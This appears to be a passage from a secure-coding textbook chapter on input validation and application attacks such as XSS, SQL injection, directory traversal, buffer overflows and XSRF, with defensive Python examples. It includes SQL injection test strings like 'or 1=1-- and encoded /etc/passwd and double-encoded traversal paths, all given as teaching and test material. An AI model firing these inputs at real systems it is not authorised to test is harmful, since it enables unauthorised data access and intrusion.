With the move to web-based applications, common errors have shifted from buffer overflows to input-handling issues. Users have the ability to manipulate input, so it is up to the developer to handle the input appropriately to prevent malicious entries from having an effect. Buffer overflows could be considered a class of improper input, but newer attacks include canonicalization attacks and arithmetic attacks. Probably the most important defensive mechanism that can be employed is input validation. Considering all inputs to be hostile until properly validated can mitigate many attacks based on common vulnerabilities. This is a challenge because the validation efforts need to occur after all parsers have completed manipulating input streams, a common function in web-based applications using Unicode and other international character sets.

Input validation is especially well suited for the following vulnerabilities: buffer overflow, reliance on untrusted inputs in a security decision, cross-site scripting, cross-site request forgery, path traversal, and incorrect calculation of buffer size. Input validation may seem suitable for various injection attacks, but given the complexity of the input and the ramifications from legal but improper input streams, this method falls short for most injection attacks. What can work is a form of recognition and whitelisting approach, where the input is validated and then parsed into a standard structure that is then executed. This restricts the attack surface to inputs that are not only legal but also expected.
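A minimal Python sketch of the recognize-and-whitelist approach, assuming a hypothetical report request that takes a date and a sort column. Input is accepted only if it matches an expected pattern or an explicit allowlist, and it is then converted into a typed structure, so later code never handles the raw string.

```python
import re
from dataclasses import dataclass
from datetime import date

# Hypothetical request parameters: a report date and a user-chosen sort column.
ALLOWED_SORT_COLUMNS = frozenset({"name", "created", "size"})  # explicit allowlist
DATE_PATTERN = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")       # ASCII digits only


@dataclass(frozen=True)
class ReportRequest:
    day: date
    sort_by: str


def parse_report_request(raw_day: str, raw_sort: str) -> ReportRequest:
    """Accept only expected input, then convert it into a standard structure."""
    if not DATE_PATTERN.fullmatch(raw_day):
        raise ValueError("date must look like YYYY-MM-DD")
    day = date.fromisoformat(raw_day)  # also rejects impossible dates such as 2024-02-30
    if raw_sort not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    return ReportRequest(day=day, sort_by=raw_sort)
```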

Consider all input to be hostile. Input validation is one of the most important secure coding techniques employed, mitigating a wide array of potential vulnerabilities. Failure to properly validate input is the leading cause of vulnerabilities.

In today’s computing environment, a wide range of character sets is used. Unicode and other character code sets provide multilanguage support, and various encoding schemes, such as hex encoding, are supported to allow diverse inputs. The net result of all these input methods is that there are numerous ways to create the same input to a program. Canonicalization is the process by which application programs manipulate strings to a base form, creating a foundational representation of the input. A canonicalization error arises from the fact that inputs to a web application may be processed by multiple applications, such as the web server, application server, and database server, each with its own parsers to resolve canonicalization issues. The problem lies in the form of the input string at the time of error checking: if the error-checking routine runs before the input has been resolved to canonical form, then issues may be missed. The string /../, used in directory traversal attacks, can be obscured by encoding and hence missed by a character string match before an application parser converts it to canonical form.
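The ordering problem can be shown with Python's standard `urllib.parse.unquote`. This sketch assumes the web framework percent-decodes the value exactly once before the file system sees it; the check is only meaningful when it inspects that decoded form.

```python
from urllib.parse import unquote


def check_before_decoding(raw: str) -> bool:
    """Flawed order: inspects the string exactly as received."""
    return "../" not in raw


def check_after_decoding(raw: str) -> bool:
    """Better order: decode to the form the file system will see, then inspect."""
    return "../" not in unquote(raw)


attack = "docs/%2e%2e/%2e%2e/etc/passwd"  # decodes to docs/../../etc/passwd
```

Here `check_before_decoding(attack)` returns True (the attack slips through), while `check_after_decoding(attack)` returns False.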

The first line of defense is to write solid code. Regardless of the language used or the source of outside input, prudent programming practice is to treat all input from outside a function as hostile. Validate all inputs as if they were hostile and an attempt to force a buffer overflow. Accept the notion that although during development everyone may be on the same team, conscientious, and compliant with design rules, future maintainers may not be as careful.

Tech Tip

Pointer Dereference

Some computer languages use a construct referred to as a pointer, which is an element that refers to the memory location that holds a variable, as opposed to the value in that memory location. To get the value at the memory location denoted by a pointer variable, one must dereference the pointer. Dereferencing changes the meaning of the object to the contents of the memory location, not the memory location identified by the pointer. Pointers can be very powerful and allow fast operations across a wide range of structures. But they can also be dangerous, as mistakes in their use can lead to unexpected consequences. For example, a program that combines user input with pointers might let the user pick a position in an array and then use a pointer to reference the value stored there. Mistakes in validating that input can lead to errors in pointer dereference that may or may not trigger an error, because the referenced location will contain some data and that data will be returned.

Normalization

Normalization is an initial step in the input validation process. Specifically, it is the process of creating the canonical form, or simplest form, of a string before processing. Strings can be encoded using Unicode and other encoding methods. This makes byte-by-byte comparisons meaningless when trying to test user input of strings. Checking to see whether the string is “rose” can be difficult when “A Rose is a rose is a r%6fse.” The process of normalization converts all of these instances to “rose,” where it can then be screened as valid input.

Different libraries exist to assist developers in performing this part of input validation. Developers should always normalize their inputs prior to validation steps to remove Unicode and other encoding issues. Per the Unicode standard, “When implementations keep strings in a normalized form, they can be assured that equivalent strings have a unique binary representation.”
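A sketch of a normalization step in Python, using the standard `unicodedata` module for Unicode normalization and `urllib.parse.unquote` for percent-encoding. Choosing NFKC (rather than NFC) and case-folding are assumptions for this example: NFKC also folds compatibility characters such as full-width letters, which suits screening input but changes more characters than NFC does.

```python
import unicodedata
from urllib.parse import unquote


def canonicalize(text: str) -> str:
    """Reduce a string to one canonical form before it is validated."""
    text = unquote(text)                        # resolve %xx escapes: "r%6fse" -> "rose"
    text = unicodedata.normalize("NFKC", text)  # equivalent strings get one binary form
    return text.casefold()                      # remove case differences: "Rose" -> "rose"
```

After `canonicalize`, all three spellings in "A Rose is a rose is a r%6fse" compare equal to "rose", and a decomposed "e" plus combining accent matches the precomposed "é".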

Tech Tip

A Rose is a rose is a r%6fse

Canonical form refers to simplest form and, because of the many encoding schemes in use, can be a complex issue. Characters can be encoded in ASCII, Unicode, hex, UTF-8, or even combinations of these. So an attacker who wants to obfuscate an input has several options.

By URL-encoding URL strings, it may be possible to circumvent security filters and intrusion detection systems (IDSs). For example, the URL

http://www.myweb.com/cgi?file=/etc/passwd

can be written as

http://www.myweb.com/cgi?file=/%2F%65%74%63%2F%70%61%73%73%77%64

Double encoding can complicate the matter even further. For example, the round 1 decoding

scripts/..%255c../winnt

becomes

scripts/..%5c../winnt

(%25 = "%" Character)

And the round 2 decoding

scripts/..%5c../winnt

becomes

scripts/..\../winnt

(%5c = "\" Character)

The bottom line is simple: know that encoding can be used and plan for it when designing input verification mechanisms. Expect encoded transmissions to be used to attempt to bypass security mechanisms.
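The two decoding rounds above can be reproduced with Python's `urllib.parse.unquote`. The hypothetical filter `filter_decoding_once` decodes a single time before looking for a backslash traversal, so the double-encoded string passes it; the traversal only appears after a second decoding layer, such as a later parser, processes the input.

```python
from urllib.parse import unquote

raw = "scripts/..%255c../winnt"
round1 = unquote(raw)     # "%25" decodes to "%": scripts/..%5c../winnt
round2 = unquote(round1)  # "%5c" decodes to a backslash: scripts/..\../winnt


def filter_decoding_once(value: str) -> bool:
    """Returns True (allow) unless a backslash traversal appears after ONE decode."""
    return "..\\" not in unquote(value)
```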



A second, and equally important, line of defense is proper string handling. String handling is a common event in programs, and string-handling functions are the source of a large number of known buffer-overflow vulnerabilities. Using strncpy() in place of strcpy() is a possible method of improving security because strncpy() requires an input length for the number of characters to be copied. This simple function call replacement can ultimately fail, however, because Unicode and other encoding methods can make character counts meaningless. Resolving this issue requires new library calls and much closer attention to how input strings, and subsequently output strings, can be abused. Proper use of functions to achieve program objectives is essential to prevent unintended effects such as buffer overflows. The gets() function can never be made safe: it reads from the stdin stream until it reaches a newline or end-of-file and has no way of knowing the size of the destination buffer, so there is no way to predetermine whether the input is going to overflow the buffer. A better solution is to use a C++ stream object or the fgets() function. The function fgets() requires an input buffer length and hence avoids the overflow. Simply replace calls to gets() with calls to fgets(), passing the size of the destination buffer.

Output validation is just as important in many cases as input validation. If querying a database for a username and password match, the expected forms of the output of the match function should be either one match or none. If the record count is used to indicate the level of match, which is a common practice, then a value other than 0 or 1 would be an error. Defensive coding using output validation would not act on values greater than 1 because these are clearly an error and should be treated as a failure.
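Output validation for the login example might look like the following Python sketch using the standard `sqlite3` module. The `users` table and its `username` and `password_hash` columns are hypothetical (hashing the password is outside this sketch). The code acts only on a count of exactly 1 and treats any larger count as an error rather than a successful login.

```python
import logging
import sqlite3

log = logging.getLogger("auth")


def authenticate(conn: sqlite3.Connection, username: str, password_hash: str) -> bool:
    """Act only on the expected output: exactly one matching record."""
    (count,) = conn.execute(
        "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchone()
    if count > 1:
        # Duplicate matches should be impossible; record it and fail closed.
        log.error("%d records matched user %r", count, username)
    return count == 1
```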

Bug Tracking

Bug tracking is a foundational element in secure development. All bugs are enumerated, classified, and tracked. If the classification of a bug exceeds a set level, then it must be resolved before the code advances to the next level of development. Bugs are classified based on the risk the vulnerability exposes. Microsoft uses these four levels:

Critical: A security vulnerability having the highest potential for damage

Important: A security vulnerability having significant potential for damage, but less than Critical

Moderate: A security vulnerability having moderate potential for damage, but less than Important

Low: A security vulnerability having low potential for damage
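The gating rule can be expressed in a few lines of Python. The `Severity` ordering follows the four levels above, but `may_advance`, the `Bug` record, the default blocking level of Important, and the choice to block at or above that level are assumptions for illustration, not Microsoft's tooling.

```python
from dataclasses import dataclass
from enum import IntEnum


class Severity(IntEnum):
    # Ordered so that comparisons follow potential for damage.
    LOW = 1
    MODERATE = 2
    IMPORTANT = 3
    CRITICAL = 4


@dataclass
class Bug:
    bug_id: str
    severity: Severity
    resolved: bool = False


def may_advance(bugs: list[Bug], blocking_level: Severity = Severity.IMPORTANT) -> bool:
    """Code advances only if no unresolved bug is at or above the blocking level."""
    return not any(b.severity >= blocking_level and not b.resolved for b in bugs)
```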

Examples of Critical vulnerabilities include those that, without warning to the user, can be exploited remotely to elevate privilege. Critical is really reserved for the most significant risks. As an example of the distinction between Critical and Important, a vulnerability that would lead to a machine failure requiring reinstallation of software would only score Important. The key difference is that the user would know of this penetration and risk, whereas for a Critical vulnerability, the user may never know that it occurred.

The tracking of errors serves several purposes. First, from a management perspective, what is measured is managed, both by management and by those involved. Over time, fewer errors will occur if the workforce knows that errors are being tracked, are taken seriously, and represent an issue with the product. Second, since not all errors are immediately correctable, tracking enables future correction when a module is rewritten. Zero defects in code is like zero defects in quality; it’s not an achievable objective. But this does not mean that continuous improvement of the process cannot dramatically reduce error rates. Evidence from firms involved in SAFECode supports this, as they are reaping the benefits of lower error rates and reduced development costs from lower levels of corrective work.

Application Attacks

Attacks against a system can occur at the network level, at the operating system level, at the application level, and at the user level (social engineering). Early attack patterns were against the network, but most of today’s attacks are aimed at the applications, primarily because that is where the objective of most attacks resides—in the infamous words of bank robber Willie Sutton, “because that’s where the money is.” In fact, many of today’s attacks on systems use combinations of vulnerabilities in networks, operating systems, and applications—all a means to an end to obtain the desired objective of an attack, which is usually some form of data.

Application-level attacks take advantage of several facts associated with computer applications. First, most applications are large programs written by groups of programmers and by their nature have errors in design and coding that create vulnerabilities. For a list of typical vulnerabilities, see the Common Vulnerabilities and Exposures list maintained by MITRE (http://cve.mitre.org). Second, even when vulnerabilities are discovered and patched by software vendors, end users are slow to apply patches, as evidenced by the SQL Slammer incident in January 2003. The vulnerability exploited was a buffer overflow, and the vendor supplied a patch six months prior to the outbreak, yet the worm still spread quickly because of the multitude of unpatched systems.

Cross-Site Scripting

Cross-site scripting (XSS) is one of the most common web attack methodologies.

Cross-site scripting is abbreviated as XSS to distinguish it from Cascading Style Sheets (CSS).

A cross-site scripting attack is a code injection attack in which an attacker sends code in response to an input request. The web server then includes this code in the output it generates, and the code is executed by the browser that renders that output. Cross-site scripting attacks take advantage of a few common elements in web-based systems. First is the common failure to perform complete input validation: XSS sends a script in response to an input request, even when the script is not the expected or authorized input type. Second is the nature of web-based systems to dynamically self-create output. Web-based systems are frequently collections of images, text, scripts, and more, which are presented by a web server to a browser that interprets and renders them. XSS attacks exploit this dynamically self-created output by executing a script in the client browser that receives the altered output.

The cause of the vulnerability is weak user input validation. If input is not validated properly, an attacker can include a script in their input and have it rendered as part of the web process. There are several different types of XSS attacks, distinguished by the effect of the script:

Nonpersistent XSS attack: The injected script is not persisted or stored but rather is immediately passed back via the web server and executed in the browser.

Persistent XSS attack: The script is permanently stored on the web server or some back-end storage. This allows the script to be used against others who log in to the system.

DOM-based XSS attack: The script is executed in the browser via the Document Object Model (DOM) process as opposed to the web server.

Cross-site scripting attacks can result in a wide range of consequences, and in some cases, the list can be anything that a clever scripter can devise. Common uses that have been seen in the wild include the following:

Stealing authentication information from a web application

Hijacking a session

Deploying hostile content

Changing user settings, including those of future users

Impersonating a user

Phishing or stealing sensitive information

Controls to defend against XSS attacks include the use of anti-XSS libraries to strip scripts from the input sequences. Various other ways to mitigate XSS attacks include limiting types of uploads and screening the size of uploads, whitelisting inputs, and so on, but attempting to remove scripts from inputs can be a tricky task. Well-designed anti-XSS input library functions have proven to be the best defense. Cross-site scripting vulnerabilities are easily tested for and should be part of the test plan for every application. Testing a variety of encoded and unencoded inputs for scripting vulnerability is an essential test element.
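The text describes libraries that strip scripts from input; a closely related and widely used technique is output encoding, sketched here with Python's standard `html.escape`. Rather than removing markup, it converts the characters HTML treats as syntax into entities, so the browser displays the attacker's script as text instead of running it. This sketch covers HTML element content and quoted attribute values only; other contexts, such as JavaScript or URLs, need their own encoding. `render_comment` is a hypothetical helper.

```python
import html


def render_comment(user_text: str) -> str:
    """Build an HTML fragment in which user text is encoded as data, not markup."""
    # quote=True also encodes " and ' so the value is safe inside quoted attributes.
    return '<p class="comment">' + html.escape(user_text, quote=True) + "</p>"
```

For example, `render_comment("<script>alert('x')</script>")` yields `<p class="comment">&lt;script&gt;alert(&#x27;x&#x27;)&lt;/script&gt;</p>`, which a browser shows as literal text.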

Input validation, also commonly known as data validation, is the structured and proper testing of any input that is supplied by an application or user. Input validation prevents improperly formed (malformed) data from entering a system.

Injections

Using input to a function without validation has already been shown to be risky behavior. Another issue with unvalidated input is code injection: rather than supplying appropriate data to the function, the injected input changes what the function does in an unintended way.

The primary method of defense against this type of vulnerability is similar to that for buffer overflows: validate all inputs. But rather than validating toward just length, you need to validate inputs for content. Imagine a web page that asks for user input and then uses that input to build a subsequent page. Now imagine that the user puts the text for a JavaScript function in the middle of their input sequence, along with a call to the script. Now, the generated web page has an added JavaScript function that is called when displayed. Passing the user input through an HTMLencode function before use can prevent such attacks.

Again, good programming practice goes a long way toward preventing these types of vulnerabilities. This places the burden not just on the programmers but also on the process of training programmers, the software engineering process that reviews code, and the testing process to catch programming errors. This is much more than a single-person responsibility; everyone involved in the software development process needs to be aware of the types and causes of these errors, and safeguards need to be in place to prevent their propagation.

SQL Injection

A SQL injection attack is a form of code injection aimed at any SQL-based database, regardless of vendor. An example of this type of attack is where the function takes the user-provided inputs for username and password and substitutes them into a where clause of a SQL statement with the express purpose of changing the where clause into one that gives a false answer to the query.

Assume the desired SQL statement is as follows:

![]()

The values JDoe and newpass are provided by the user and are simply inserted into the string sequence. Though seemingly safe functionally, this can be easily corrupted by using the following sequence:

' or 1=1 --

This changes the where clause to one that returns all records, as shown here:

![]()

The addition of the or clause, with an always-true statement and the beginning of a comment line to block the trailing single quote, alters the SQL statement to one in which the where clause is rendered inoperable.

Stored procedures are precompiled methods implemented within a database engine. Stored procedures act as a secure coding mechanism because they offer an isolation of user input from the actual SQL statements being executed. This is the primary defense mechanism against SQL injection attacks—in other words, separation of user input from the SQL statements. User-supplied input data is essential in interactive applications that use databases; these types of applications allow the user to define the specificity of search, match, and so on. But what cannot happen is to allow a user to write the actual SQL code that is executed. There are too many things that could go wrong, there is too much power to allow a user to directly wield it, and eliminating SQL injection attacks by “fixing” input has never worked.
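The separation principle can be demonstrated with Python's standard `sqlite3` module. SQLite has no stored procedures, so this sketch uses parameterized queries, a different mechanism that applies the same idea: the SQL text is fixed and user input is bound only as data. The `users` table with a plain-text `password` column mirrors the simplified example in the text and is hypothetical.

```python
import sqlite3


def find_user_unsafe(conn: sqlite3.Connection, username: str, password: str) -> list:
    # VULNERABLE: the user's input becomes part of the SQL text itself.
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, username: str, password: str) -> list:
    # The SQL text is fixed; "?" placeholders bind the input strictly as data values.
    return conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchall()
```

Entering `' or 1=1 --` as the password makes the unsafe version return every row, because the input rewrites the where clause; the parameterized version simply looks for a user whose password is that literal string and finds none.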

All major database engines support stored procedures. Stored procedures have a performance advantage over other forms of data access. The downside is that stored procedures are written in another language, SQL, and typically need a database programmer to implement the more complex ones.

Both whitelisting and input validation are helpful at preventing SQL injection attacks. But the gold standard to protect from SQL injection is the use of stored procedures.

Tech Tip

Testing for SQL Injection Vulnerability

There are two main steps associated with testing for SQL injection vulnerability. The first one needs to confirm that the system is at all vulnerable. This can be done using various inputs to test whether an input variable can be used to manipulate the SQL command. The following are common test vectors used:

'or 1=1--

"or 1=1--

or 1=1--

'or 'a'='a

"or "a"="a

') or ('a'='a

Note that the use of single or double quotes is SQL implementation dependent because there are syntactic differences between the major database engines.

The second step is to use the error message information to attempt to perform an actual exploit against the database.

LDAP Injection

LDAP-based systems are also subject to injection attacks. When an application constructs an LDAP request based on user input, a failure to validate the input can lead to bad LDAP requests. Just as SQL injection can be used to execute arbitrary commands in a database, LDAP injection can do the same in a directory system. Something as simple as a wildcard character (*) in a search box can return results that would normally be beyond the scope of a query. Proper input validation is important before passing the request to an LDAP engine.
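A minimal Python sketch of escaping user input before it is placed in an LDAP search filter. RFC 4515 requires the characters `*`, `(`, `)`, `\`, and NUL to be escaped in filter values as a backslash followed by two hex digits. The filter template and attribute names in `user_search_filter` are hypothetical; production code would normally use the escaping helper supplied by its LDAP library.

```python
# Characters that RFC 4515 requires to be escaped inside filter assertion values.
_LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\0": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Replace each special character with its backslash-hex escape."""
    return "".join(_LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def user_search_filter(name: str) -> str:
    # Hypothetical filter template; the user's text can no longer add clauses or wildcards.
    return f"(&(objectClass=person)(cn={escape_filter_value(name)}))"
```

A lone `*` typed into the search box becomes the literal value `\2a`, so it no longer matches every entry.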

Tech Tip

DLL Injection

Dynamic link libraries (DLLs) are pieces of code that can add functionality to a program through the inclusion of library routines linked at runtime. DLL injection is the process of adding to a program, at runtime, a DLL with a specific vulnerability or function that an attacker can capitalize on. Microsoft Office, a suite of programs that load DLLs at runtime, is a good example of a target. Placing an “evil” DLL in the correct directory, or registering it via a registry key, can cause the program to load it and run the attacker’s added functionality.

XML Injection

XML can be tampered with via injection as well. XML injections can be used to manipulate an XML-based system. As XML is nearly ubiquitous in the web application world, this form of attack has a wide range of targets.
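One common form of XML injection occurs when a document is assembled by string concatenation. This Python sketch, using the standard `xml.etree.ElementTree` module, contrasts that with building the document through an XML API that escapes text content; the `user`/`name`/`role` structure and the payload are hypothetical.

```python
import xml.etree.ElementTree as ET


def build_unsafe(username: str) -> str:
    # VULNERABLE: the input is pasted into the markup, so it can add elements.
    return "<user><name>" + username + "</name><role>guest</role></user>"


def build_safe(username: str) -> str:
    # ElementTree escapes &, <, and > in text content when serializing.
    user = ET.Element("user")
    ET.SubElement(user, "name").text = username
    ET.SubElement(user, "role").text = "guest"
    return ET.tostring(user, encoding="unicode")


payload = "eve</name><role>admin</role><name>x"
```

Parsed back, the unsafe document's first `role` element is `admin`, injected by the payload; in the safe document the payload stays inside `name` as text and the only role is `guest`.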

Directory Traversal/Command Injection

A directory traversal attack is when an attacker uses special inputs to circumvent the directory tree structure of the file system. Adding encoded symbols for “../..” in an unvalidated input box can result in the parser resolving the encoding to the traversal code, bypassing many detection elements, and passing the input to the file system. The program then executes the commands in a different location than designed. When combined with a command injection, the input can result in the execution of code in an unauthorized manner. Classified as input validation errors, these can be difficult to detect without doing code walkthroughs and specifically looking for them. This illustrates the usefulness of the Top 25 Most Dangerous Software Errors checklist during code reviews because it alerts developers to this issue during development.

Directory traversals can be masked by using the encoding of input streams. If the security check is done before the string is decoded by the system parser, then recognition of the attack form may be impaired. There are many ways to represent a particular input form, the simplest of which is the canonical form (introduced earlier in the “A Rose is a rose is a r%6fse” Tech Tip). Parsers are used to render the canonical form for the OS, but these embedded parsers may act after input validation, making it more difficult to detect certain attacks from just matching a string.
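One defense is to decode the input, resolve it to a canonical absolute path, and only then check that the result is still inside the directory the application is allowed to serve. This Python sketch uses `pathlib`; `BASE_DIR` and `resolve_user_path` are hypothetical, and `Path.is_relative_to` requires Python 3.9 or later.

```python
from pathlib import Path
from urllib.parse import unquote

BASE_DIR = Path("/srv/app/files")  # hypothetical directory the application serves


def resolve_user_path(requested: str, base: Path = BASE_DIR) -> Path:
    """Decode, canonicalize, then confirm the path stays under the base directory."""
    root = base.resolve()
    # resolve() collapses ".." segments and follows symbolic links.
    # An absolute input replaces root entirely; the containment check catches that too.
    candidate = (root / unquote(requested)).resolve()
    if not candidate.is_relative_to(root):
        # Generic message: do not echo internal paths back to the user.
        raise PermissionError("requested path is outside the allowed directory")
    return candidate
```

Because the check runs on the resolved path rather than on the raw string, `../../etc/passwd`, its encoded form `..%2f..%2fetc%2fpasswd`, and the absolute `/etc/passwd` are all rejected.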

Buffer Overflow

If there’s one item that could be labeled as the “most wanted” in coding security, it would be the buffer overflow. The CERT/CC at Carnegie Mellon University estimates that nearly half of all exploits of computer programs stem historically from some form of buffer overflow. Finding a vaccine to buffer overflows would stamp out half of these security-related incidents by type, and probably 90 percent by volume. The Morris finger worm in 1988 was an exploit of an overflow, as were more recent big-name events such as Code Red and Slammer. The generic classification of buffer overflows includes many variants, such as static buffer overruns, indexing errors, format string bugs, Unicode and ANSI buffer size mismatches, and heap overruns.

The concept behind these vulnerabilities is relatively simple. The input buffer that is used to hold program input is overwritten with data that is larger than the buffer can hold. The root cause of this vulnerability is a mixture of two things: poor programming practice and programming language weaknesses. For example, what would happen if a program that asks for a seven- to ten-character phone number instead receives a string of 150 characters? Many programs will provide some error checking to ensure that this will not cause a problem. Some programs, however, cannot handle this error, and the extra characters continue to fill memory, overwriting other portions of the program. This can result in a number of problems, including causing the program to abort or the system to crash. Under certain circumstances, the program can execute a command supplied by the attacker. Buffer overflows typically inherit the level of privilege enjoyed by the program being exploited. This is why programs that use root-level access are so dangerous when exploited with a buffer overflow, as the code that will execute does so with root-level access.

Programming languages such as C were designed for space and performance constraints. Many functions in C, like gets(), are unsafe in that they will permit unsafe operations, such as unbounded string manipulation into fixed buffer locations. The C language also permits direct memory access via pointers, a functionality that provides a lot of programming power but carries with it the burden of proper safeguards being provided by the programmer.

Buffer overflows can occur in any code, and code that runs with privilege has an even greater risk profile. In 2014, Heartbleed, a buffer over-read (a closely related bounds-checking flaw) in the OpenSSL library, left hundreds of thousands of systems vulnerable and exposed critical data for millions of users worldwide.

Buffer overflows are input validation attacks, designed to take advantage of input routines that do not validate the length of inputs. They are surprisingly simple to resolve: all that is required is the validation of all input lengths prior to writing to memory. This can be done in a variety of manners, including the use of safe library functions for inputs. This is one of the vulnerabilities that has been shown to be solvable, and in fact its prevalence is declining substantially among major security-conscious software firms.
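Python manages memory itself, so it cannot overflow a buffer this way; the following sketch only models the check that C code must make before writing. A `bytearray` stands in for a fixed ten-byte buffer, and the hypothetical `store_phone` uses the seven- to ten-character phone number example from the text, validating length and content before anything is written.

```python
PHONE_BUFFER_SIZE = 10  # hypothetical fixed-size field: at most ten digits


def store_phone(buffer: bytearray, phone: str) -> None:
    """Validate length and content before writing into the fixed-size buffer."""
    data = phone.encode("ascii")  # non-ASCII input raises UnicodeEncodeError, a ValueError
    if not 7 <= len(data) <= len(buffer):
        raise ValueError(f"phone number must be 7 to {len(buffer)} digits")
    if not data.isdigit():
        raise ValueError("phone number must contain digits only")
    buffer[:] = bytes(len(buffer))  # clear old contents without changing the size
    buffer[:len(data)] = data       # len(data) <= len(buffer): nothing lands past the end
```

The 150-character string from the text is rejected before any byte is written, rather than being allowed to spill into adjacent memory.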

Integer Overflow

An integer overflow is a programming error condition that occurs when a program attempts to store a numeric value, which is an integer, in a variable that is too small to hold it. The results vary by language and numeric type. In some cases, the value saturates the variable, assuming the maximum value for the defined type and no more. In other cases, especially with signed integers, it can roll over into a negative value because the most significant bit is usually reserved for the sign of the number. This can create significant logic errors in a program.
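Both behaviors can be illustrated in Python, whose own integers never overflow. This sketch uses the standard `ctypes.c_int32` type, which silently truncates to 32 bits, to model wraparound, and a hypothetical `checked_add_i32` that rejects out-of-range results instead. In C, signed integer overflow is formally undefined behavior; wraparound is simply what is commonly observed.

```python
import ctypes

INT32_MIN, INT32_MAX = -(2**31), 2**31 - 1


def wrapping_add_i32(a: int, b: int) -> int:
    """Model of a 32-bit signed add that wraps around silently."""
    return ctypes.c_int32(a + b).value  # ctypes keeps only the low 32 bits, no error


def checked_add_i32(a: int, b: int) -> int:
    """Reject sums that do not fit in a 32-bit signed integer."""
    result = a + b
    if not INT32_MIN <= result <= INT32_MAX:
        raise OverflowError(f"{a} + {b} does not fit in a 32-bit signed integer")
    return result
```

`wrapping_add_i32(2147483647, 1)` returns -2147483648: the largest positive value plus one rolls over to the most negative value, because the top bit is the sign bit.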

Integer overflows are easily tested for, and static code analyzers (covered later) can point out where they are likely to occur. Given this, there are no excuses for having these errors end up in production code.

Cross-Site Request Forgery

Cross-site request forgery (XSRF) attacks utilize unintended behaviors that are proper in defined use but are performed under circumstances outside the authorized use. This is an example of the “confused deputy” problem—a class of problems where one entity mistakenly performs an action on behalf of another. An XSRF attack relies upon several conditions to be effective. It is performed against sites that have an authenticated user and exploits the sites’ trust in a previous authentication event. Then, by tricking a user’s browser into sending an HTTP request to the target site, the trust is exploited. Assume your bank allows you to log in and perform financial transactions but does not validate the authentication for each subsequent transaction. If a user is logged in and has not closed their browser, then an action in another browser tab could send a hidden request to the bank, resulting in a transaction that appears to be authorized but in fact was not done by the user.


The term I days refers to vulnerabilities that remain exploitable forever (infinitely) because they are caused by design errors and thus are almost impossible to mitigate directly.

Many different mitigation techniques can be employed, from limiting authentication times and expiring cookies to checking specific elements of a request, such as its headers. The strongest method is the use of random XSRF tokens in form submissions: the server places an unpredictable token in each legitimate form, and a forged request cannot succeed because the attacker does not know the token and so cannot include it. Testing for XSRF takes a bit more planning than for other injection-type attacks, but this, too, can be accomplished as part of the design process.
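
The token approach can be sketched as follows. This is a minimal illustration, assuming a hypothetical in-memory session store and hypothetical function names; a real web framework would keep tokens in its own session mechanism. The server remembers a random token per session and embeds it in each legitimate form. A forged request sent from another tab still carries the session cookie, but the attacker's page cannot read the token, so it cannot supply it.

```python
import hmac
import secrets
from typing import Dict, Optional

# Hypothetical in-memory store: session ID -> XSRF token for that session.
_session_tokens: Dict[str, str] = {}


def issue_xsrf_token(session_id: str) -> str:
    """Generate an unpredictable token and remember it on the server.

    The caller embeds the token in a hidden field of each form it renders.
    """
    token = secrets.token_urlsafe(32)
    _session_tokens[session_id] = token
    return token


def is_valid_submission(session_id: str, submitted_token: Optional[str]) -> bool:
    """Accept a state-changing request only if it echoes the session's token."""
    expected = _session_tokens.get(session_id)
    if expected is None or submitted_token is None:
        return False
    # Constant-time comparison avoids leaking the token through timing differences.
    return hmac.compare_digest(expected.encode(), submitted_token.encode())


token = issue_xsrf_token("session-123")
print(is_valid_submission("session-123", token))  # True: legitimate form post
print(is_valid_submission("session-123", None))   # False: forged request lacks the token
```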

Zero Day

Zero day is a term used to define vulnerabilities that are newly discovered and not yet addressed by a patch. Most vulnerabilities exist in an unknown state until discovered by a researcher or the developer. If a researcher or developer discovers a vulnerability but does not share the information, then this vulnerability can be exploited without the vendor being able to fix it, because for all practical purposes the issue is unknown to everyone except the person who found it. From the time of discovery until a fix or patch is made available, the vulnerability goes by the name zero day, indicating that it has not been addressed yet. The most frightening thing about zero days is the unknown factor: their capabilities and effect on risk are unknown.

Tech Tip

0, N, and I Day Vulnerabilities

Zero days, or 0 days (also called “oh days”), represent a set of vulnerabilities that are known to an attacker but not to the software developer, and hence are not being looked at to remediate.

N days is the term used to describe vulnerabilities that are known in general but not known to the affected users. A vendor may have been warned about a vulnerability, but until it is patched and each customer has addressed it, the clock keeps running. This requires communication between the software vendor and its customers to get them to install the patches and protect their systems. Many famous worms have used vulnerabilities that were months past discovery but still unpatched.

I days are infinite days, or vulnerabilities that are known, not fixed, and no plan or method to fix them exists. These vulnerabilities require an outside compensating control to manage.

All vulnerabilities begin when the code is released. These categories merely describe their relationship with the vendor with respect to discovery.

Attachments

Attachments can also be used as an attack vector. If a user inputs a graphics file (for instance, a JPEG file) and that file is altered to contain executable code such as Java, then when the image is rendered, the code is executed. This can enable a wide range of attacks.
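
One common first-line defense is to check that an uploaded file's content actually matches the type it claims to be, rather than trusting its name. The following minimal sketch uses a hypothetical allowlist of JPEG and PNG together with the standard leading signatures ("magic bytes") of those formats. It is not sufficient on its own: a crafted file can be a valid image and still carry a payload, so re-encoding images with a trusted library and never executing uploaded content are stronger follow-ups.

```python
import os
from typing import Optional

# Standard leading signatures ("magic bytes") of the allowed formats.
SIGNATURES = {
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Hypothetical allowlist mapping file extensions to expected content types.
ALLOWED_EXTENSIONS = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png"}


def sniff_image_type(data: bytes) -> Optional[str]:
    """Identify the format from the file's leading bytes, or return None."""
    for kind, magic in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    return None


def accept_upload(filename: str, data: bytes) -> bool:
    """Accept only allowed image types whose content agrees with the extension."""
    extension = os.path.splitext(filename)[1].lower()
    claimed = ALLOWED_EXTENSIONS.get(extension)
    return claimed is not None and sniff_image_type(data) == claimed


print(accept_upload("photo.jpg", b"\xff\xd8\xff\xe0" + bytes(16)))  # True
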